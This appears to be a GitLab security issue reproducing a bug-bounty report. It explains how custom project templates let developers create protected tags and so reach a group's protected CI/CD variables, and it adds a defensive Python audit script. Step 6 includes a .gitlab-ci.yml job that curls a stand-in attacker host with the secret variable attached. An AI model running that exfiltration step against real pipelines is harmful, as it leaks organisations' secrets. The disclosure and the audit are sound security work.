Developers can steal group's CI/CD variables using custom project templates

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2450288 by js_noob on 2024-04-06, assigned to @cmaxim:


Report

This report is almost the same as #2431500, the team closed it without providing sufficient details, I responded but didn't get any attention, probably because it's closed. I still believe this is a high bug, so reporting again to get more details/clarifications.

The only change here is that the create-from-template feature in a group for developers is okay, where I thought it wasn't in the last report; however, this doesn't change the impact of this.

Summary

Hello team, when a project is created using a custom template, the permission for protected branches is reset to maintainers: even if the settings in the template project allowed anyone to push to protected branches, this setting is reset to only allow maintainers. This is mainly done when the import is done by someone who is not the owner.

I searched a lot in the docs, but this is not documented anywhere; this is done in:

And this can be easily verified by a couple of tests.

This is okay and better for security. But for protected tags, it's not, and the setting is simply persisted from the "original" template project (this is obvious in the example/POC below).
So a developer can create a project from a template that allows developers to create protected tags, in a group, allowing them to steal that group's protected CI/CD variables.
This can be easily done by creating a new branch with malicious code and applying a protected tag to it, which triggers the "protected" pipeline, allowing it to steal them.

Steps to reproduce

The below is just a simple scenario of how this can be exploited, but there are many more, and I can provide POCs for others if requested.

As an owner:

  1. Create a group and apply the ultimate trial to it
  2. Create 2 subgroups in that group; let's call them projects and templates
  3. Navigate to https://gitlab.com/groups/MAIN_GROUP/-/edit and under "Custom project templates", select the templates subgroup
  4. In the projects group, create a protected var called VAR with any value. We'll be stealing this later
  5. Invite USER_2 as a maintainer to the templates group, and as a developer to the projects group

As User 2:

  6. In the templates group, create a new project with the following content in the .gitlab-ci.yml file:

     my_job:
       script:
         - "curl -X GET https://evil_doman.com?VAR=$VAR"

  7. In that project, create a protected tag wildcard target in https://gitlab.com/MAIN_GROUP/templates/PROJECT/-/settings/repository, and make sure to allow developers + maintainers to create, similar to:

     Screenshot_2024-03-23_at_2.17.50_AM.png

  8. Navigate to the projects group, choose to create a project from a template, open the group section, and create a new project from the template you created in the templates group (this shouldn't be allowed)
  9. Create a new protected tag, and verify that the pipeline is triggered on that protected tag
  10. Verify that the protected variable is sent to the attacker's controlled server

Example

Screen_Recording_2024-03-23_at_2.28.24_AM.mov

What is the current bug behavior?

Developers can create projects using custom templates.

What is the expected correct behavior?

Developers shouldn't be able to create projects using custom templates.

Output of checks

This bug happens on GitLab.com

Impact

Disclosure of a group's CI/CD variables to unauthorized users (developers).
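Added example (not part of the report and not GitLab's own code): a small audit that inspects the protected-tag rules of projects used as custom templates and flags any rule whose create access is granted below Maintainer, since, as described above, those rules are carried over into projects created from the template while protected-branch rules are not. It parses the JSON shape returned by GitLab's `GET /projects/:id/protected_tags` API; the sample payload is constructed here for illustration, and the access-level values (0 = No one, 30 = Developers + Maintainers, 40 = Maintainers) are GitLab's documented constants.

```python
"""Flag protected-tag rules that developers could use to trigger protected pipelines.

Added example for this issue; it is not code from the report or from GitLab.
It works on the JSON returned by GET /projects/:id/protected_tags.
"""
import json
import urllib.request

# GitLab access-level constants for protected tag "allowed to create"
NO_ACCESS = 0
DEVELOPER = 30
MAINTAINER = 40

# Constructed sample payload in the shape of the protected_tags API response.
SAMPLE_PROTECTED_TAGS = json.loads("""
[
  {"name": "v*",
   "create_access_levels": [
     {"id": 1, "access_level": 30, "access_level_description": "Developers + Maintainers"}]},
  {"name": "release-*",
   "create_access_levels": [
     {"id": 2, "access_level": 40, "access_level_description": "Maintainers"}]}
]
""")


def risky_tag_rules(protected_tags, min_ok_level=MAINTAINER):
    """Return (tag_pattern, description) for every create rule below min_ok_level.

    A rule that lets developers (30) or anyone (0) create a matching tag will be
    copied into projects created from this template, so it is worth reviewing
    before the project is exposed as a group custom template.
    """
    findings = []
    for rule in protected_tags:
        for level in rule.get("create_access_levels", []):
            access = level.get("access_level")
            if access is not None and access < min_ok_level:
                description = level.get("access_level_description", str(access))
                findings.append((rule["name"], description))
    return findings


def fetch_protected_tags(base_url, project_id, token):
    """Fetch the live rules for one project (assumes a valid read_api token).

    Not exercised by the sample below; provided so the audit can run against a
    real instance, e.g. every project in the group chosen as the template source.
    """
    url = f"{base_url}/api/v4/projects/{project_id}/protected_tags"
    req = urllib.request.Request(url, headers={"PRIVATE-TOKEN": token})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


if __name__ == "__main__":
    for pattern, who in risky_tag_rules(SAMPLE_PROTECTED_TAGS):
        print(f"review: tag rule {pattern!r} can be created by {who}")
```

Run against each project in the subgroup selected under "Custom project templates"; any finding means a project created from that template, by whoever is allowed to use it, will start with the same developer-creatable protected tags and therefore the same access to the target group's protected variables.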

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: